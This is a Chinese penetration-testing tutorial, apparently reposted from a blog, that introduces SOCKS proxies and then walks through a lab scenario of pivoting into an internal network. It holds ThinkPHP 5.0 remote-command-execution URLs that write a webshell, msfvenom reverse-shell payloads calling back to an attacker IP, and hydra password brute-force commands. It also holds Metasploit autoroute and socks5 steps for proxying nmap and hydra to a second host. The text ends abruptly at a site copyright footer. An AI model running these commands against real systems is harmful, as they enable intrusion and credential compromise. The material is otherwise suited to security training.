文章目录
Socks代理实战
Socks代理简介
- 什么是socks
SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。
根据OSI模型,SOCKS是会话层的协议,位于表示层与传输层之间。
使用TCP协议传输数据,因而不提供如传递 ICMP 信息之类的网络层网关服务。

osi参考模型:https://www.cnblogs.com/qishui/p/5428938.html
现今大多组织的网络架构,利用网络防火墙将组织内部的网络结构与外部网络如 Internet 有效地隔离开来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET、FTP、SMTP等的接入。
而SOCKS则提供一个通用框架来使这些协议安全透明地穿过防火墙。
- 什么是socks代理
- 被代理端与代理服务器通过SOCKS4/5代理协议进行通讯;
- SOCKS4是对HTTP代理协议的加强,它不仅代理HTTP协议,而是对所有向外的连接进行代理,没有协议限制;
- SOCKS5对前一版本做了进一步扩展,增加了支持UDP代理和身份验证功能;
- SOCKS5采用地址解析方案 (addressing scheme) 以支持域名和 IPV6 地址解析。
使用Socks代理:
- SOCKS服务器的IP地址
- SOCKS服务所在端口
- SOCKS服务是否需要身份验证
Socks代理工具
- EarthWorm
http://rootkiter.com/EarthWorm/
- FRP
https://github.com/fatedier/frp
frp 是一个可用于内网穿透的高性能的反向代理应用
- ProxyChains
http://proxychains.sourceforge.net/
关于ProxyChains工具:
- 它是一个代理工具。
- 最新版本:3.1
- 专用OS:Linux和其他Unices。
- 允许TCP和DNS通过代理隧道。
- 支持HTTP、SOCKS4和SOCKS5代理服务器。
- 不同的代理类型可以混合在同一链中。
- 代理链:用户定义的代理链列表。
可用性:
- 通过代理服务器运行任何程序。
- 从限制性防火墙后面访问互联网。
- 隐藏你的IP
- 通过代理服务器运行SSH、telnet、wget、ftp、apt、vnc、nmap。
5, 从外部通过反向代理访问内联网(192.168../10..)。
- Other
reDuh:https://github.com/sensepost/reDuh reGeorg:https://github.com/sensepost/reGeorg sSocks:https://sourceforge.net/projects/ssocks/ SocksCap64:http://www.sockscap64.com Proxifier:https://www.proxifier.com/
Socks代理实战-MSF
渗透场景

Target1
- 信息收集
nmap -A -T4 -p- --script vuln 192.168.78.66 开放端口:21/22/80/111/888/3306/8888 操作系统:Linux

- 分析利用
21 / 22端口:弱口令爆破 hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ftp hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ssh 3306端口:不允许远程IP连接 8888端口:宝塔登录页面 80端口:Thinkphp v5.0 存在远程命令执行漏洞,通过命令执行写入一句话,可GetShell。 /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=
- 主机信息收集
ifconfig:发现存在192.168.22.0/24的内网网段。 探测此网段存活主机,发现存活主机 192.168.22.22



#!/bin/bash for num in {
1..254}; do ip=192.168.22.$num ping -c1 $ip >/dev/null 2>&1 if [ $? = 0 ]; then echo "$ip" Ok else echo "$ip" No fi done
@echo off chcp 65001>nul echo 正在扫描。。。。。。 for /L %%P in (1,1,254) do @ping -w 10 -n 1 192.168.78.%%P | findstr TTL= >>ip.txt echo 扫描结束,按任意键结束窗口! pause>nul
- 建立Socks代理
- 反弹target1的shell到msf
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.78.117 lport=6666 R > mingy.php msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.78.117 lport=6667 -f elf > mingy.elf
- 上传到target1的tmp目录下
chmod 777 mingy.elf ./mingy.elf
- 获得target1的
meterpreter shell后,添加到192.168.22网段的路由
run autoroute -s 192.168.22.0/24 run autoroute -p
- 使用msf的socks5模块建立socks服务,并配置proxychains代理
msf5 > use auxiliary/server/socks5 msf5 auxiliary(server/socks5) > run
vim /etc/proxychains.conf socks5 127.0.0.1 1080
Target2
- 信息收集
proxychains nmap -sT -Pn -p- -n -T4 192.168.22.22 开放端口:21/22/80/3306/8888 操作系统:linux

- 分析利用
21 / 22 / 3306端口:弱口令爆破 proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ftp proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ssh proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 mysql 8888端口:宝塔登录页面 80端口:bagecms(sql注入,任意文件编辑漏洞) proxychains curl 192.168.22.22版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/207805.html原文链接:https://javaforall.net
